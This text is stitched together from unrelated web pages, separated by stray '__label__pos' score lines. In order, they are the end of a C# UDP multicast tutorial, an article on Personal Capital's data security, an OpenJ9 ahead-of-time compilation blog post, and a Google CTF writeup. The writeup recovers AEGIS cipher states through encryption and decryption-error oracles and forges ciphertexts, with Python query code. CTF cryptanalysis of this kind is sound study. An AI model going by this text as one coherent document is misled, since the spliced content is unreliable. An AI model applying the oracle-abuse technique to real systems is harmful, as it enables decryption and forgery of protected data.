I recently used Parallels just to test drive Solaris 10. My hard drive went from 35 gigs to 29 something, however once I was done and deleted the Solaris VM my mac is now telling me that I have 34 gigs of space. Any idea what happened to the remaining space, and if so how can I recover that without getting rid of Parallels completely?
2. dkp
dkp
Messages:
1,411
How did you delete the VM?
3. ddollas
ddollas
Messages:
2
i clicked delete, and used the delete assist wizard.
4. mmischke
mmischke
Messages:
155
Look in ~/Library/Parallels (assuming you create your VMs in the default location) and see if there's a folder having the same name which you gave your Solaris VM. If this folder still exists, you can just drag it to the trash. If no such folder exists then the missing disk space is probably not Parallels-related.
Share This Page
|
__label__pos
| 0.998928 |
File: CodeGenerator.cs
package info (click to toggle)
mono 4.6.2.7+dfsg-1
• links: PTS, VCS
• area: main
• in suites: stretch
• size: 778,148 kB
• ctags: 914,052
• sloc: cs: 5,779,509; xml: 2,773,713; ansic: 432,645; sh: 14,749; makefile: 12,361; perl: 2,488; python: 1,434; cpp: 849; asm: 531; sql: 95; sed: 16; php: 1
file content (466 lines) | stat: -rw-r--r-- 18,820 bytes parent folder | download | duplicates (2)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
#region MIT license
//
// MIT license
//
// Copyright (c) 2007-2008 Jiri Moudry, Pascal Craponne
//
// Permission is hereby granted, free of charge, to any person obtaining a copy
// of this software and associated documentation files (the "Software"), to deal
// in the Software without restriction, including without limitation the rights
// to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
// copies of the Software, and to permit persons to whom the Software is
// furnished to do so, subject to the following conditions:
//
// The above copyright notice and this permission notice shall be included in
// all copies or substantial portions of the Software.
//
// THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
// IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
// FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
// AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
// LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
// OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
// THE SOFTWARE.
//
#endregion
using System;
using System.Collections.Generic;
using System.IO;
using System.Linq;
using DbLinq.Data.Linq;
using DbLinq.Schema;
using DbLinq.Schema.Dbml;
using DbLinq.Schema.Dbml.Adapter;
using DbLinq.Util;
using Type = System.Type;
#if MONO_STRICT
using System.Data.Linq;
#endif
namespace DbMetal.Generator.Implementation.CodeTextGenerator
{
#if !MONO_STRICT
public
#endif
abstract partial class CodeGenerator : ICodeGenerator
{
public abstract string LanguageCode { get; }
public abstract string Extension { get; }
protected class MassDisposer : IDisposable
{
public IList<IDisposable> Disposables = new List<IDisposable>();
public void Dispose()
{
for (int index = Disposables.Count - 1; index > 0; index--)
{
Disposables[index].Dispose();
}
}
}
protected abstract CodeWriter CreateCodeWriter(TextWriter textWriter);
public void Write(TextWriter textWriter, Database dbSchema, GenerationContext context)
{
if (dbSchema == null || dbSchema.Tables == null)
{
//Logger.Write(Level.Error, "CodeGenAll ERROR: incomplete dbSchema, cannot start generating code");
return;
}
context["namespace"] = string.IsNullOrEmpty(context.Parameters.Namespace)
? dbSchema.ContextNamespace
: context.Parameters.Namespace;
context["database"] = dbSchema.Name;
context["generationTime"] = context.Parameters.GenerateTimestamps
? DateTime.Now.ToString("u")
: "[TIMESTAMP]";
context["class"] = dbSchema.Class;
using (var codeWriter = CreateCodeWriter(textWriter))
{
WriteBanner(codeWriter, context);
WriteUsings(codeWriter, context);
string contextNamespace = context.Parameters.Namespace;
if (string.IsNullOrEmpty(contextNamespace))
contextNamespace = dbSchema.ContextNamespace;
string entityNamespace = context.Parameters.Namespace;
if (string.IsNullOrEmpty(entityNamespace))
entityNamespace = dbSchema.EntityNamespace;
bool generateDataContext = true;
var types = context.Parameters.GenerateTypes;
if (types.Count > 0)
generateDataContext = types.Contains(dbSchema.Class);
if (contextNamespace == entityNamespace)
{
using (WriteNamespace(codeWriter, contextNamespace))
{
if (generateDataContext)
WriteDataContext(codeWriter, dbSchema, context);
WriteClasses(codeWriter, dbSchema, context);
}
}
else
{
if (generateDataContext)
using (WriteNamespace(codeWriter, contextNamespace))
WriteDataContext(codeWriter, dbSchema, context);
using (WriteNamespace(codeWriter, entityNamespace))
WriteClasses(codeWriter, dbSchema, context);
}
}
}
private void WriteBanner(CodeWriter writer, GenerationContext context)
{
using (writer.WriteRegion(context.Evaluate("Auto-generated classes for ${database} database on ${generationTime}")))
{
// http://www.network-science.de/ascii/
// http://www.network-science.de/ascii/ascii.php?TEXT=MetalSequel&x=14&y=14&FONT=_all+fonts+with+your+text_&RICH=no&FORM=left&STRE=no&WIDT=80
writer.WriteCommentLines(
@"
____ _ __ __ _ _
| _ \| |__ | \/ | ___| |_ __ _| |
| | | | '_ \| |\/| |/ _ \ __/ _` | |
| |_| | |_) | | | | __/ || (_| | |
|____/|_.__/|_| |_|\___|\__\__,_|_|
");
writer.WriteCommentLines(context.Evaluate("Auto-generated from ${database} on ${generationTime}"));
writer.WriteCommentLines("Please visit http://linq.to/db for more information");
}
}
private void WriteUsings(CodeWriter writer, GenerationContext context)
{
writer.WriteUsingNamespace("System");
writer.WriteUsingNamespace("System.Data");
writer.WriteUsingNamespace("System.Data.Linq.Mapping");
writer.WriteUsingNamespace("System.Diagnostics");
writer.WriteUsingNamespace("System.Reflection");
#if MONO_STRICT
writer.WriteUsingNamespace("System.Data.Linq");
#else
writer.WriteLine("#if MONO_STRICT");
writer.WriteUsingNamespace("System.Data.Linq");
writer.WriteLine("#else // MONO_STRICT");
writer.WriteUsingNamespace("DbLinq.Data.Linq");
writer.WriteUsingNamespace("DbLinq.Vendor");
writer.WriteLine("#endif // MONO_STRICT");
#endif
// writer.WriteUsingNamespace("System");
// writer.WriteUsingNamespace("System.Collections.Generic");
// writer.WriteUsingNamespace("System.ComponentModel");
// writer.WriteUsingNamespace("System.Data");
// writer.WriteUsingNamespace("System.Data.Linq.Mapping");
// writer.WriteUsingNamespace("System.Diagnostics");
// writer.WriteUsingNamespace("System.Linq");
// writer.WriteUsingNamespace("System.Reflection");
// writer.WriteUsingNamespace("System.Text");
//#if MONO_STRICT
// writer.WriteUsingNamespace("System.Data.Linq");
//#else
// writer.WriteUsingNamespace("DbLinq.Data.Linq");
// writer.WriteUsingNamespace("DbLinq.Data.Linq.Mapping");
//#endif
// now, we write usings required by implemented interfaces
foreach (var implementation in context.Implementations())
implementation.WriteHeader(writer, context);
// write namespaces for members attributes
foreach (var memberAttribute in context.Parameters.MemberAttributes)
WriteUsingNamespace(writer, GetNamespace(memberAttribute));
writer.WriteLine();
}
/// <summary>
/// Writes a using, if given namespace is not null or empty
/// </summary>
/// <param name="writer"></param>
/// <param name="nameSpace"></param>
protected virtual void WriteUsingNamespace(CodeWriter writer, string nameSpace)
{
if (!string.IsNullOrEmpty(nameSpace))
writer.WriteUsingNamespace(nameSpace);
}
protected virtual string GetNamespace(string fullName)
{
var namePartIndex = fullName.LastIndexOf('.');
// if we have a dot, we have a namespace
if (namePartIndex < 0)
return null;
return fullName.Substring(0, namePartIndex);
}
private IDisposable WriteNamespace(CodeWriter writer, string nameSpace)
{
if (!string.IsNullOrEmpty(nameSpace))
return writer.WriteNamespace(nameSpace);
return null;
}
private void WriteDataContext(CodeWriter writer, Database schema, GenerationContext context)
{
if (schema.Tables.Count == 0)
{
writer.WriteCommentLine("L69 no tables found");
return;
}
string contextBase = schema.BaseType;
var contextBaseType = string.IsNullOrEmpty(contextBase)
? typeof(DataContext)
: TypeLoader.Load(contextBase);
// in all cases, get the literal type name from loaded type
contextBase = writer.GetLiteralType(contextBaseType);
var specifications = SpecificationDefinition.Partial;
if (schema.AccessModifierSpecified)
specifications |= GetSpecificationDefinition(schema.AccessModifier);
else
specifications |= SpecificationDefinition.Public;
if (schema.ModifierSpecified)
specifications |= GetSpecificationDefinition(schema.Modifier);
using (writer.WriteClass(specifications, schema.Class, contextBase))
{
WriteDataContextExtensibilityDeclarations(writer, schema, context);
WriteDataContextCtors(writer, schema, contextBaseType, context);
WriteDataContextTables(writer, schema, context);
WriteDataContextProcedures(writer, schema, context);
}
}
private void WriteDataContextTables(CodeWriter writer, Database schema, GenerationContext context)
{
foreach (var table in schema.Tables)
WriteDataContextTable(writer, table);
writer.WriteLine();
}
protected abstract void WriteDataContextTable(CodeWriter writer, Table table);
protected virtual Type GetType(string literalType, bool canBeNull)
{
bool isNullable = literalType.EndsWith("?");
if (isNullable)
literalType = literalType.Substring(0, literalType.Length - 1);
bool isArray = literalType.EndsWith("[]");
if (isArray)
literalType = literalType.Substring(0, literalType.Length - 2);
Type type = GetSimpleType(literalType);
if (type == null)
return type;
if (isArray)
type = type.MakeArrayType();
if (isNullable)
type = typeof(Nullable<>).MakeGenericType(type);
else if (canBeNull)
{
if (type.IsValueType)
type = typeof(Nullable<>).MakeGenericType(type);
}
return type;
}
private Type GetSimpleType(string literalType)
{
switch (literalType)
{
case "string":
return typeof(string);
case "long":
return typeof(long);
case "short":
return typeof(short);
case "int":
return typeof(int);
case "char":
return typeof(char);
case "byte":
return typeof(byte);
case "float":
return typeof(float);
case "double":
return typeof(double);
case "decimal":
return typeof(decimal);
case "bool":
return typeof(bool);
case "DateTime":
return typeof(DateTime);
case "object":
return typeof(object);
default:
return Type.GetType(literalType);
}
}
protected string GetAttributeShortName<T>()
where T : Attribute
{
string literalAttribute = typeof(T).Name;
string end = "Attribute";
if (literalAttribute.EndsWith(end))
literalAttribute = literalAttribute.Substring(0, literalAttribute.Length - end.Length);
return literalAttribute;
}
protected AttributeDefinition NewAttributeDefinition<T>()
where T : Attribute
{
return new AttributeDefinition(GetAttributeShortName<T>());
}
protected IDisposable WriteAttributes(CodeWriter writer, params AttributeDefinition[] definitions)
{
var massDisposer = new MassDisposer();
foreach (var definition in definitions)
massDisposer.Disposables.Add(writer.WriteAttribute(definition));
return massDisposer;
}
protected IDisposable WriteAttributes(CodeWriter writer, params string[] definitions)
{
var attributeDefinitions = new List<AttributeDefinition>();
foreach (string definition in definitions)
attributeDefinitions.Add(new AttributeDefinition(definition));
return WriteAttributes(writer, attributeDefinitions.ToArray());
}
protected virtual SpecificationDefinition GetSpecificationDefinition(AccessModifier accessModifier)
{
switch (accessModifier)
{
case AccessModifier.Public:
return SpecificationDefinition.Public;
case AccessModifier.Internal:
return SpecificationDefinition.Internal;
case AccessModifier.Protected:
return SpecificationDefinition.Protected;
case AccessModifier.ProtectedInternal:
return SpecificationDefinition.Protected | SpecificationDefinition.Internal;
case AccessModifier.Private:
return SpecificationDefinition.Private;
default:
throw new ArgumentOutOfRangeException("accessModifier");
}
}
protected virtual SpecificationDefinition GetSpecificationDefinition(ClassModifier classModifier)
{
switch (classModifier)
{
case ClassModifier.Sealed:
return SpecificationDefinition.Sealed;
case ClassModifier.Abstract:
return SpecificationDefinition.Abstract;
default:
throw new ArgumentOutOfRangeException("classModifier");
}
}
protected virtual SpecificationDefinition GetSpecificationDefinition(MemberModifier memberModifier)
{
switch (memberModifier)
{
case MemberModifier.Virtual:
return SpecificationDefinition.Virtual;
case MemberModifier.Override:
return SpecificationDefinition.Override;
case MemberModifier.New:
return SpecificationDefinition.New;
case MemberModifier.NewVirtual:
return SpecificationDefinition.New | SpecificationDefinition.Virtual;
default:
throw new ArgumentOutOfRangeException("memberModifier");
}
}
/// <summary>
/// The "custom types" are types related to a class
/// Currently, we only support enums (non-standard)
/// </summary>
/// <param name="writer"></param>
/// <param name="table"></param>
/// <param name="schema"></param>
/// <param name="context"></param>
protected virtual void WriteCustomTypes(CodeWriter writer, Table table, Database schema, GenerationContext context)
{
// detect required custom types
foreach (var column in table.Type.Columns)
{
var extendedType = column.ExtendedType;
var enumType = extendedType as EnumType;
if (enumType != null)
{
context.ExtendedTypes[column] = new GenerationContext.ExtendedTypeAndName
{
Type = column.ExtendedType,
Table = table
};
}
}
var customTypesNames = new List<string>();
// create names and avoid conflits
foreach (var extendedTypePair in context.ExtendedTypes)
{
if (extendedTypePair.Value.Table != table)
continue;
if (string.IsNullOrEmpty(extendedTypePair.Value.Type.Name))
{
string name = extendedTypePair.Key.Member + "Type";
for (; ; )
{
if ((from t in context.ExtendedTypes.Values where t.Type.Name == name select t).FirstOrDefault() == null)
{
extendedTypePair.Value.Type.Name = name;
break;
}
// at 3rd loop, it will look ugly, however we will never go there
name = extendedTypePair.Value.Table.Type.Name + name;
}
}
customTypesNames.Add(extendedTypePair.Value.Type.Name);
}
// write custom types
if (customTypesNames.Count > 0)
{
using (writer.WriteRegion(string.Format("Custom type definition for {0}", string.Join(", ", customTypesNames.ToArray()))))
{
// write types
foreach (var extendedTypePair in context.ExtendedTypes)
{
if (extendedTypePair.Value.Table != table)
continue;
var extendedType = extendedTypePair.Value.Type;
var enumValue = extendedType as EnumType;
if (enumValue != null)
{
writer.WriteEnum(GetSpecificationDefinition(extendedTypePair.Key.AccessModifier),
enumValue.Name, enumValue);
}
}
}
}
}
}
}
|
__label__pos
| 0.990432 |
Take the 2-minute tour ×
MathOverflow is a question and answer site for professional mathematicians. It's 100% free, no registration required.
I'm wondering what the precise relationship is between an algebraic stack being locally of finite presentation and being limit preserving. Under some mild hypotheses on the diagonal (in force throughout the book), Prop. 4.18 of the book by Laumon-Moret--Bailly shows that a stack locally of finite presentation over some base scheme is limit preserving; I don't think the hypotheses on the diagonal are used here, and indeed I think I can piece together a proof pretty easily using the assumptions of the stacks project.
Now, I'm wondering if the converse is true. Some reasons to think it might be: in Artin's "Versal Deformations and Algebraic Stacks", he defines limit preserving, and says that it is what he had previously referred to as locally of finite presentation. Also, for algebraic spaces we have http://stacks.math.columbia.edu/tag/05N0 which shows that the two conditions are equivalent (and equivalent to being limit preserving on objects, unsurprisingly).
A reason to think they might not be equivalent: I haven't seen this statement anywhere in the literature.
share|improve this question
1 Answer 1
up vote 5 down vote accepted
Suppose that $\mathcal{X}$ is an algebraic stack which is limit preserving on objects over $S$. Suppose that $U \to \mathcal{X}$ is a smooth surjective map from a scheme. Then $U \to S$ is limit preserving by the results of Section Tag 06CT. Thus $U$ is locally of finite presentation over S (for example by the reference you gave). This exactly means that $\mathcal{X} \to S$ is locally of finite presentation.
I didn't check the direction you said was OK, but if it is, then this also means there is no difference between "limit preserving on objects" and "limit preserving" for algebraic stacks over schemes. There is a difference in general (for stacks in groupoids over schemes for example). Anyway, this is one of the many things missing from the Stacks project (thanks for pointing it out). The Stacks project takes contributions (by email or via git pull requests) if you are so inclined.
share|improve this answer
Thank you very much - this is great. I will try to find the time soon to check the other direction, and maybe even write it up for the Stacks project. – stacksnovice Jan 19 at 16:49
Your Answer
discard
By posting your answer, you agree to the privacy policy and terms of service.
Not the answer you're looking for? Browse other questions tagged or ask your own question.
|
__label__pos
| 0.521577 |
Flink.Thomas Flink.Thomas - 5 months ago 41
Java Question
Binary search program printing false
Hello every one i'm working on a binary search program. My algorithm is correct but when I run the program with the driver program i get back the value "false" repeated instead of a table that looks like this.
Table output(LINK)
here is my driver program and main program.
public class TestResulter {
public static void main(String[] args) {
//Resulter resulter = new Resulter();
int numberOfItems = 10000;
int item;
int a[ ] = new int[ numberOfItems ];
for( int i = 0; i < 20; i++ )
{
item = Resulter.randomitem( a );
System.out.println( Resulter.binarySearch( a , item ) );
}
}
}
My main program with binarySearch algorithm.
import java.util.Random;
public class Resulter extends TestResulter {
private static class Result {
public Boolean found; // true if found, false if not found
public int index; // index where item was found, -1 if not found
public int steps; // number of comparisons performed
public Result(boolean f, int ind, int st) {
found = f;
index = ind;
steps = st;
}
@Override
public String toString() {
return "Result [found=" + found + ", index=" + index + ", steps=" + steps + "]";
}
}
public static boolean binarySearch(int[] a, int item) { int start=0, end=a.length-1;
while(end>=start) { int mid = start + ((end - start) / 2);
if (a[mid] == item) return true; if (a[mid] > item) end = mid-1; else start = mid+1;
} return false;
}
public static int randomitem ( int[] a ) {
int i;
Random random = new Random();
int item = random.nextInt( 10999 );
for( i = 0; i < 10000; i++ )
{
a[ i ] = random.nextInt( 10000 );
}
return item;
}
}
I want my program to have a similar output to my image from my linear search program.
Answer
Here is your code with some changes and refactoring:
public class TestResulter
{
public static void main(String[] args)
{
int numberOfItems = 10000;
int item;
int[] a = new int[numberOfItems];
fillArray(a);
for( int i = 0; i < 20; i++ )
{
item = Resulter.randomitem(a);
System.out.println(Resulter.binarySearch(a, item));
}
}
private static void fillArray(int[] a)
{
Random random = new Random();
for(int i = 0; i < a.length; i++)
a[i] = random.nextInt(10000);
Arrays.sort(a);
}
}
public class Resulter
{
private static class Result
{
public boolean found; // true if found, false if not found
public int index; // index where item was found, -1 if not found
public int steps; // number of comparisons performed
public Result(boolean f, int ind, int st)
{
found = f;
index = ind;
steps = st;
}
@Override
public String toString()
{
return "Result [found=" + found + ", index=" + index + ", steps=" + steps + "]";
}
}
public static Result binarySearch(int[] a, int item)
{
int start=0, end=a.length-1;
int stepCount = 0;
while(end>=start)
{
stepCount++;
int mid = start + ((end - start) / 2);
if(a[mid] == item)
return new Result(true, mid, stepCount);
else if(a[mid] > item)
end = mid-1;
else
start = mid+1;
}
return new Result(false, -1, stepCount);
}
public static int randomitem(int[] a)
{
return new Random().nextInt(10000);
}
}
As I see it, the main problems in your solution were:
1. The array was not sorted. Binary search only works on sorted arrays, therefore the Arrays.sort(a) command.
2. The binarySearch returned a boolean and not a Result object, which is what you wanted to print out.
|
__label__pos
| 0.999941 |
64
I've read many times that you should never input an address by hand unless you want to accidentally send Ether into no-mans-land. I'd like to know what those checksums might be. Is there a way to tell a typo is occurred? how, and what are the formatting rules to it? Im asking so I can potentially create a wrapper function that checks for these things before submitting to the network.
54
Regular Address
EIP 55 added a "capitals-based checksum" which was implemented by Geth by May 2016. Here's Javascript code from Geth:
/**
* Checks if the given string is an address
*
* @method isAddress
* @param {String} address the given HEX adress
* @return {Boolean}
*/
var isAddress = function (address) {
if (!/^(0x)?[0-9a-f]{40}$/i.test(address)) {
// check if it has the basic requirements of an address
return false;
} else if (/^(0x)?[0-9a-f]{40}$/.test(address) || /^(0x)?[0-9A-F]{40}$/.test(address)) {
// If it's all small caps or all all caps, return true
return true;
} else {
// Otherwise check each case
return isChecksumAddress(address);
}
};
/**
* Checks if the given string is a checksummed address
*
* @method isChecksumAddress
* @param {String} address the given HEX adress
* @return {Boolean}
*/
var isChecksumAddress = function (address) {
// Check each case
address = address.replace('0x','');
var addressHash = sha3(address.toLowerCase());
for (var i = 0; i < 40; i++ ) {
// the nth letter should be uppercase if the nth digit of casemap is 1
if ((parseInt(addressHash[i], 16) > 7 && address[i].toUpperCase() !== address[i]) || (parseInt(addressHash[i], 16) <= 7 && address[i].toLowerCase() !== address[i])) {
return false;
}
}
return true;
};
ICAP Address
ICAP has a checksum which can be verified. You can review Geth's icap.go and here's a snippet from it:
// https://en.wikipedia.org/wiki/International_Bank_Account_Number#Validating_the_IBAN
func validCheckSum(s string) error {
s = join(s[4:], s[:4])
expanded, err := iso13616Expand(s)
if err != nil {
return err
}
checkSumNum, _ := new(big.Int).SetString(expanded, 10)
if checkSumNum.Mod(checkSumNum, Big97).Cmp(Big1) != 0 {
return ICAPChecksumError
}
return nil
}
| improve this answer | |
• Great answer! Out of curiosity, any idea how good the checksum is? meaning with a few wrong digits, what are the chances it passes the checksum coincidentally anyway? – ZMitton Feb 15 '16 at 11:07
• 1
EIP 55 compares the regular address checksum with ICAP: "On average there will be 15 check bits per address, and the net probability that a randomly generated address if mistyped will accidentally pass a check is 0.0247%. This is a ~50x improvement over ICAP, but not as good as a 4-byte check code." – eth May 8 '16 at 6:29
• It would be nice to be able to check for validity in Solidity as well. One way to do this would be to transfer a tiny amount of ether to any new address you create, and check for non-zero balance in Solidity. (Should that be a separate question?) – Paul S Jul 6 '16 at 3:40
• 1
@PedroLobito For sha3, you can use keccak256 from a library like github.com/emn178/js-sha3 I have not been able to find the recent code that Geth uses to improve this answer. – eth Oct 17 '17 at 8:02
• 1
@Alper Yes a smart contract address can be capitalized according to EIP 55, example. – eth Apr 15 '18 at 7:01
39
There is an easier way now with web3:
Naive:
https://web3js.readthedocs.io/en/v1.2.0/web3-utils.html#isaddress
web3.utils.isAddress('0xc1912fee45d61c87cc5ea59dae31190fffff232d');
> true
OR
Better version
https://web3js.readthedocs.io/en/v1.2.0/web3-utils.html#tochecksumaddress
try {
const address = web3.utils.toChecksumAddress(rawInput)
} catch(e) {
console.error('invalid ethereum address', e.message)
}
using checkSum method is better because you will always deal with data and never have to lowerCase.
| improve this answer | |
• The isaddress() method also checks for checksum! why do we need go with checkSum method? – atul Mar 31 at 2:44
9
The standard 40 character hex addresses now have a checksum in the form of capitalization. If the address has at least one capital letter then it is checksummed and, if inputted on a site that checks the sum, it will return false if it's not a valid address.
The scheme is as follows:
convert the address to hex, but if the ith digit is a letter (ie. it's one of abcdef) print it in uppercase if the ith bit of the hash of the address (in binary form) is 1 otherwise print it in lowercase
You can read VBs full writeup here: https://github.com/ethereum/EIPs/issues/55
| improve this answer | |
5
The python package 'ethereum' has a function called 'check_checksum' in the utils module:
from ethereum.utils import check_checksum
check_checksum('0xc1912fee45d61c87cc5ea59dae31190fffff232d')
> True
I build a small project for this which i use programmatically in my apps. It has a 'micro' api:
https://balidator.io/api/ethereum/0xea0258D0E745620e77B0A389e3A656EFdb7Cf821
It also has address validation for bitcoin, monero, and ripple.
You can find the documentation here: balidator.io/api-documentation
| improve this answer | |
4
function validateInputAddresses(address) {
return (/^(0x){1}[0-9a-fA-F]{40}$/i.test(address));
}
| improve this answer | |
• This just test plausibility, doesn't validate the checksum. It still seems to be a better way to write the plausibility test regex. – Simeon Mar 21 '18 at 11:23
2
So far ether addresses have no checksum and are simply the HEX encoding of the address bytes. There is however a proposal for encoding and checksum, see: ICAP: Inter exchange Client Address Protocol.
ICAP has preliminary support merged in some Ethereum client.
| improve this answer | |
2
Checksums are mechanisms to prevent sending funds to wrong addresses (set by mistake or by a malicious party).
Programmatically
You can use web3's amazing utils:
web3.utils.toChecksumAddress(value)
The function above works only if you have version 1.0.0 or above.
Web
I created an online tool, check it out here: EthSum.
| improve this answer | |
0
Another way to check is if you also have the public key of the ethereum address. The Ethereum Foundation's official eth-keys Python library can be used, and is now part of their Github repo and can be seen here and contains a suite of tools that include ways to check address validity, such as using the PublicKey().checksum_address() method (see below example).
The following method requires the uncompressed public key in bytes format, which means it would have to be only for accounts you have the public-key data for:
>>>from eth-keys import keys
>>>keys.PublicKey(b'\x98\xbb\xfa\xdd\xbc\xc7\xab\x14\xa3\x9c\xb4\x84\xbf\x94MO\xf5\x91^G\xc1\xc2\x0b\xe77t\xc3\xd0\x05\x12|Z\xf5\x17PZ\x97\xe2\\`IR\xc1\xbd\x10\xa3\xa3\xdf\xbf0\xaf;7\xc0z\xbc\xc7\x0b\x9c\xbd<FY\x98').to_checksum_address()
'0x28f4961F8b06F7361A1efD5E700DE717b1db5292'
| improve this answer | |
Your Answer
By clicking “Post Your Answer”, you agree to our terms of service, privacy policy and cookie policy
Not the answer you're looking for? Browse other questions tagged or ask your own question.
|
__label__pos
| 0.86038 |
Тасование Ханафуда
Обновлено: 30.09.2019
Есть несколько способов, чтобы перетасовать колоду карт. Одним из таких примеров является перетасовка для японской карточной игры “Ханафуда”. Ниже показано, как ее выполнить.
Имеется колода из n карт. Начиная с p-ой карты сверху, c карт вынимаются и кладутся на вершину колоды. Такую операцию назовем операциею срезки.
Напишите программу, которая моделирует перетасовку Ханафуда, и выведет номер карты, которая в конце будет находиться наверху.
Входные данные
Состоит из нескольких тестов. Каждый тест начинается со строки, содержащей два натуральных числа n (1 ≤ n ≤ 50) и r (1 ≤ r ≤ 50) - количество карт в колоде и количество операций срезания.
Каждая из следующих r строк описывает операцию срезания. Они выполняются в перечисленном порядке. Каждая строка содержит два натуральных числа p и c (p + c ≤ n + 1). Начиная с p-ой карты сверху, c карт вытаскиваются и кладутся наверх.
Последняя строка содержит два нуля.
Выходные данные
Для каждого теста вывести в отдельной строке номер верхней карты после выполнения тасования. Считайте, что сначала карты пронумерованы числами от 1 до n снизу доверху.
Алгоритм решения задачи
• Выполняем операции пока на вход не получим два нуля;
• Читаем n и r;
• Заполняем список начальными данными;
• С помощью LINQ выполняем перетасовку Ханафуда.
Решение
using System;
using System.Collections.Generic;
using System.Linq;
class Program
{
static void Main(string[] args)
{
while (true)
{
var prts = Array.ConvertAll(Console.ReadLine().Split(new[] { ' ' }, StringSplitOptions.RemoveEmptyEntries),
s => int.Parse(s));
var n = prts[0];
var r = prts[1];
if (n == 0 && r == 0)
return;
var list = new List<int>();
for (var i = n; i >= 1; i--)
{
list.Add(i);
}
for (var i = 0; i < r; i++)
{
prts = Array.ConvertAll(Console.ReadLine().Split(new[] { ' ' }, StringSplitOptions.RemoveEmptyEntries),
s => int.Parse(s));
var p = prts[0] - 1;
var c = prts[1];
var tmpList = new List<int>();
tmpList.AddRange(list.Skip(p).Take(c));
tmpList.AddRange(list.Take(p));
tmpList.AddRange(list.Skip(p + c));
list = tmpList;
}
Console.WriteLine(list[0]);
}
}
}
Поделиться: Vk Ok
comments powered by Disqus
|
__label__pos
| 0.504319 |
%% You should probably cite rfc6828 instead of this I-D. @techreport{ietf-avtext-splicing-for-rtp-07, number = {draft-ietf-avtext-splicing-for-rtp-07}, type = {Internet-Draft}, institution = {Internet Engineering Task Force}, publisher = {Internet Engineering Task Force}, note = {Work in Progress}, url = {https://datatracker.ietf.org/doc/draft-ietf-avtext-splicing-for-rtp/07/}, author = {Jinwei Xia}, title = {{Content Splicing for RTP Sessions}}, pagetotal = 16, year = , month = , day = , abstract = {This memo outlines RTP splicing. Splicing is a process that replaces the content of the main multimedia stream with other multimedia content, and delivers the substitutive multimedia content to receiver for a period of time. This memo provides some RTP splicing use cases, then we enumerate a set of requirements and analyze whether an existing RTP level middlebox can meet these requirements, at last we provide concrete guidelines for how the chosen middlebox works to handle RTP splicing.}, }
|
__label__pos
| 0.999663 |
Source
APKinspector / androguard / classification / libsimilarity / sources / xz-5.0.2 / m4 / lib-prefix.m4
The default branch has multiple heads
Full commit
# lib-prefix.m4 serial 5 (gettext-0.15)
dnl Copyright (C) 2001-2005 Free Software Foundation, Inc.
dnl This file is free software; the Free Software Foundation
dnl gives unlimited permission to copy and/or distribute it,
dnl with or without modifications, as long as this notice is preserved.
dnl From Bruno Haible.
dnl AC_LIB_ARG_WITH is synonymous to AC_ARG_WITH in autoconf-2.13, and
dnl similar to AC_ARG_WITH in autoconf 2.52...2.57 except that is doesn't
dnl require excessive bracketing.
ifdef([AC_HELP_STRING],
[AC_DEFUN([AC_LIB_ARG_WITH], [AC_ARG_WITH([$1],[[$2]],[$3],[$4])])],
[AC_DEFUN([AC_][LIB_ARG_WITH], [AC_ARG_WITH([$1],[$2],[$3],[$4])])])
dnl AC_LIB_PREFIX adds to the CPPFLAGS and LDFLAGS the flags that are needed
dnl to access previously installed libraries. The basic assumption is that
dnl a user will want packages to use other packages he previously installed
dnl with the same --prefix option.
dnl This macro is not needed if only AC_LIB_LINKFLAGS is used to locate
dnl libraries, but is otherwise very convenient.
AC_DEFUN([AC_LIB_PREFIX],
[
AC_BEFORE([$0], [AC_LIB_LINKFLAGS])
AC_REQUIRE([AC_PROG_CC])
AC_REQUIRE([AC_CANONICAL_HOST])
AC_REQUIRE([AC_LIB_PREPARE_MULTILIB])
AC_REQUIRE([AC_LIB_PREPARE_PREFIX])
dnl By default, look in $includedir and $libdir.
use_additional=yes
AC_LIB_WITH_FINAL_PREFIX([
eval additional_includedir=\"$includedir\"
eval additional_libdir=\"$libdir\"
])
AC_LIB_ARG_WITH([lib-prefix],
[ --with-lib-prefix[=DIR] search for libraries in DIR/include and DIR/lib
--without-lib-prefix don't search for libraries in includedir and libdir],
[
if test "X$withval" = "Xno"; then
use_additional=no
else
